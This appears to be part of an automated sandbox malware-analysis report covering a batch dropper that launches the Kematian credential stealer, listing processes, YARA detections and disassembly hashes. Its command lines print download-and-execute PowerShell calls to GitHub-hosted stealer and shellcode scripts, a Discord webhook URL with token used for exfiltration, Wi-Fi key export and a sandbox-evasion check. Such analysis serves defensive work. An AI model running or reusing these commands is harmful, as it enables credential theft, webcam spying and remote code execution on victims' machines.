                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:12:08:06
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:12:08:08
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:12:08:19
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:12:08:19
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:12:08:21
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff77f030000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:12:08:21
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:12:08:21
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -nop -c "Write-Host -NoNewLine $null"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:12:08:22
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -nop -c "Write-Host -NoNewLine $null"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32
                                      Imagebase:0x7ff6b0d80000
                                      File size:71'680 bytes
                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\net.exe
                                      Wow64 process (32bit):false
                                      Commandline:net session
                                      Imagebase:0x7ff60b670000
                                      File size:59'904 bytes
                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\net1.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\net1 session
                                      Imagebase:0x7ff679f20000
                                      File size:183'808 bytes
                                      MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\mshta.exe
                                      Wow64 process (32bit):false
                                      Commandline:mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
                                      Imagebase:0x7ff704180000
                                      File size:14'848 bytes
                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:12:08:25
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:false

                                      General

                                      Target ID:26
                                      Start time:12:08:25
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:27
                                      Start time:12:08:25
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff7b4ee0000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:28
                                      Start time:13:20:48
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff7fb730000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:30
                                      Start time:13:20:53
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
                                      Imagebase:0x7ff7e45d0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:13:20:55
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:13:20:58
                                      Start date:03/07/2024
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
                                      Imagebase:0x7ff65f9f0000
                                      File size:2'759'232 bytes
                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:13:20:58
                                      Start date:03/07/2024
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
                                      Imagebase:0x7ff6df720000
                                      File size:52'744 bytes
                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:13:21:08
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Go lang
                                      Yara matches:
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFAAC6266E8 Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9a010883f1a6fe9fc1c7569250dc53987f1fee0a21ea36579a07c4dbc7757b4
                                        • Instruction ID: 42a168e95cf3f2a94a1414b829aa14a0e345e0f8dc4d5428d314e2e59f6daa94
                                        • Opcode Fuzzy Hash: a9a010883f1a6fe9fc1c7569250dc53987f1fee0a21ea36579a07c4dbc7757b4
                                        • Instruction Fuzzy Hash: 5131E97091CB488FDB1DDB5C9C466A97BE0FB99321F00422FE449D3252DB71A8568BC2
                                        Function 00007FFAAC626A88 Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a78d73aa6a4252734054665c6f5302940ff8a5cf3a9c44e4be7cdd3402ec5b7
                                        • Instruction ID: 4b9ba1ff18726889df0367eb30ef4e4b573a5ca5d147e7a012b3cac2eea38853
                                        • Opcode Fuzzy Hash: 1a78d73aa6a4252734054665c6f5302940ff8a5cf3a9c44e4be7cdd3402ec5b7
                                        • Instruction Fuzzy Hash: D8210A3190C74C8FEB59DB9C984A7E97BE0EBA6321F04816BD049C3152DA74A45ACB91
                                        Function 00007FFAAC623535 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction ID: c98df3356cfbac9f5aaa3a9a1d60ee347b254d0bb7c6e02209e7f43d8b9b4b96
                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction Fuzzy Hash: 1601847010CB088FD748EF0CE051AA5B3E0FB85320F10052DE58AC3661DA32E881CB41
                                        Function 00007FFAAC6268C8 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad0493de0ff8c40722a7077e77503b0c482a75ae21af32391798c0cc6f36fe2a
                                        • Instruction ID: eb1e7589df1e93dea7f5b84166c48abc7b6deb3415dd9367fa3daaa01d9e9344
                                        • Opcode Fuzzy Hash: ad0493de0ff8c40722a7077e77503b0c482a75ae21af32391798c0cc6f36fe2a
                                        • Instruction Fuzzy Hash: 38F024748086898FDB4ADF28C8164E5BFA0FF26211F04429BE44CC31A2DB74E558CBD2

                                        Non-executed Functions

                                        Function 00007FFAAC625CF2 Relevance: 5.2, Strings: 4, Instructions: 202COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: P^7$`\7$M_^$^7
                                        • API String ID: 0-1590912181
                                        • Opcode ID: 07390fb51bfb006f6a2a42744afceff19cb27a55f5552d0c276834615e3c6734
                                        • Instruction ID: 66f79d4742f68ff5918ef7b678a85886a1f81a8d9c901c9679737cbaabc58b38
                                        • Opcode Fuzzy Hash: 07390fb51bfb006f6a2a42744afceff19cb27a55f5552d0c276834615e3c6734
                                        • Instruction Fuzzy Hash: 4351B59790F7C15FF767D7786CA52E97F90DF43164B0895F7D0C88A097A809980E82E1
                                        Function 00007FFAAC62044D Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1367756068.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ffaac620000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (08$8,8$p08$/8
                                        • API String ID: 0-2069709940
                                        • Opcode ID: 9c2da87e079be07d0af8bbba24263eda1e86eaee51ff85a696ab42805b9fb27e
                                        • Instruction ID: e2443d90c10c133cdc28ca40a02deab5e84a674f94431b4d7b24e072da2d8b79
                                        • Opcode Fuzzy Hash: 9c2da87e079be07d0af8bbba24263eda1e86eaee51ff85a696ab42805b9fb27e
                                        • Instruction Fuzzy Hash: 2A313A97C0F7C18FF3579BB81865169AE619F13640719A4FBE0CC8A5ABB4099D0C83D2

                                        Executed Functions

                                        Function 00007FFAAC5062C0 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1687583245.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac500000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: c5cac9c72c9c5c3dfd8f77a6b83513c235e5469e4ce0b91db6600f0dc6172a28
                                        • Instruction ID: 68168ada686d58e517071847fcdc1a7cf4878e94a534736dca128bbbd3a14389
                                        • Opcode Fuzzy Hash: c5cac9c72c9c5c3dfd8f77a6b83513c235e5469e4ce0b91db6600f0dc6172a28
                                        • Instruction Fuzzy Hash: 9461F7A5A0DB869FF389D72884696657BE1EF56300F1841FEE48DCB2E7CD28DC058781
                                        Function 00007FFAAC5D1AFD Relevance: .5, Instructions: 512COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1688314019.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac5d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b620fecf9b3851a3c64b5d9d988b7897326685cf2eb246c57e97007a03a80d15
                                        • Instruction ID: 72f4f04e2b4a7955277942f8a2774fa4114478d958d0be0f9d06961551ec9f70
                                        • Opcode Fuzzy Hash: b620fecf9b3851a3c64b5d9d988b7897326685cf2eb246c57e97007a03a80d15
                                        • Instruction Fuzzy Hash: 35E1F362E4EB8A8FF797DB6858512617FE4EF57220B0941FBE04DC71A3E908D8498391
                                        Function 00007FFAAC505E7A Relevance: .5, Instructions: 510COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1687583245.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac500000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bcade8972093085cb6fe9d488020d1e726c96b17e50fa39f1596210186f2a8db
                                        • Instruction ID: 23685a53c627134060d098a4873154d765f420a6051da996d37ba14d4181eb3b
                                        • Opcode Fuzzy Hash: bcade8972093085cb6fe9d488020d1e726c96b17e50fa39f1596210186f2a8db
                                        • Instruction Fuzzy Hash: 6F618170A0874D8FEB59DF68C855BA9BBF1FF59310F1481AAD04ED3292DA34A845CB81
                                        Function 00007FFAAC5D078D Relevance: .4, Instructions: 449COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1688314019.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac5d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 992c1d1e37f9730f862d6085f0c83584d6d42ab366172308d9fdbe353b8657d4
                                        • Instruction ID: 4f31144919667ef403d375711b8a7340012c1c9baf7a2c4d7318afbd65211583
                                        • Opcode Fuzzy Hash: 992c1d1e37f9730f862d6085f0c83584d6d42ab366172308d9fdbe353b8657d4
                                        • Instruction Fuzzy Hash: 11D1A06294EBC68FF797977848652B57FE5DF97210B1840FBE08DC7193EC0898498392
                                        Function 00007FFAAC506689 Relevance: .2, Instructions: 193COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1687583245.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac500000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8ff6c46e4fcc70ec5cb7d7bdb3877a8530d3656594c6b702f5a4bce7f2eca67
                                        • Instruction ID: 2930469f34c4efee995e5af00b5909b1908b421766f656574496aae0d057eead
                                        • Opcode Fuzzy Hash: a8ff6c46e4fcc70ec5cb7d7bdb3877a8530d3656594c6b702f5a4bce7f2eca67
                                        • Instruction Fuzzy Hash: A9515170918A0D8FDB98DF68D895BEDBBF1FF59311F10826AD04DD3252DA34A8458B81
                                        Function 00007FFAAC5D1B3B Relevance: .1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1688314019.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac5d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b0384f0a7b571aa88e15260891271429179330d2f72ba072b546dfed2f5049f
                                        • Instruction ID: b754ff012375e8aa30f3f0e4bab892f4d9c87faf4d63a476089fb72e11c972af
                                        • Opcode Fuzzy Hash: 5b0384f0a7b571aa88e15260891271429179330d2f72ba072b546dfed2f5049f
                                        • Instruction Fuzzy Hash: 4B31F031E4EB4A8FFB96DB6894557723BE5EF56221B0841BBE40DC71A2ED14EC088380
                                        Function 00007FFAAC5D085A Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1688314019.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac5d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3e2f51df33514afdedc5f6c05cd6b3cd8f86d00080608175ceb4f5123796bcc
                                        • Instruction ID: e10cb9790dfb65f3ae0e07551e59261c39b20078552c40dffb6791cd9e3df3df
                                        • Opcode Fuzzy Hash: a3e2f51df33514afdedc5f6c05cd6b3cd8f86d00080608175ceb4f5123796bcc
                                        • Instruction Fuzzy Hash: CF319362E5FB878BF7AAE36848653B816D5DF9666074840BBE04EC31D3EC08DC4842C2
                                        Function 00007FFAAC5033B5 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1687583245.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac500000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction ID: 83491f2d683989a3624c96fecaff66a90ec307111ce987dd928b28ca0c503dbd
                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction Fuzzy Hash: EB01A77011CB0D8FD744EF0CE051AA5B3E0FB85324F10052DE58AC3661DA32E882CB41
                                        Function 00007FFAAC5D0F88 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1688314019.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac5d0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53b2dd99dfe9649d277b62bbc5e6f6559b494123842e0371bf1f20ab5eef8acd
                                        • Instruction ID: 2e269355cf2d7ef3e0c64e396597e55e147b976cd5479278b8fa95034a3980e6
                                        • Opcode Fuzzy Hash: 53b2dd99dfe9649d277b62bbc5e6f6559b494123842e0371bf1f20ab5eef8acd
                                        • Instruction Fuzzy Hash: 87E09223E4EA2B4AF3D2F35864452F4A6C0DFC5622B5481B7E95DC3182DC04985402C2

                                        Non-executed Functions

                                        Function 00007FFAAC5010FA Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001F.00000002.1687583245.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_31_2_7ffaac500000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1050098d76ba288ede48f58a8c40bacfd8e2077e2a6980419b9728f5f4530e72
                                        • Instruction ID: 58be101e0af0351e5d9265f741eb3eefde26d76cbb2ec53208c031856383edb8
                                        • Opcode Fuzzy Hash: 1050098d76ba288ede48f58a8c40bacfd8e2077e2a6980419b9728f5f4530e72
                                        • Instruction Fuzzy Hash: 45517B57E4E7D3AFF6935B6C18A50E67F60DE5325474940F3D4C9CA083A809980E87E2

                                        Execution Graph

                                        Execution Coverage:1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:56.5%
                                        Total number of Nodes:46
                                        Total number of Limit Nodes:12
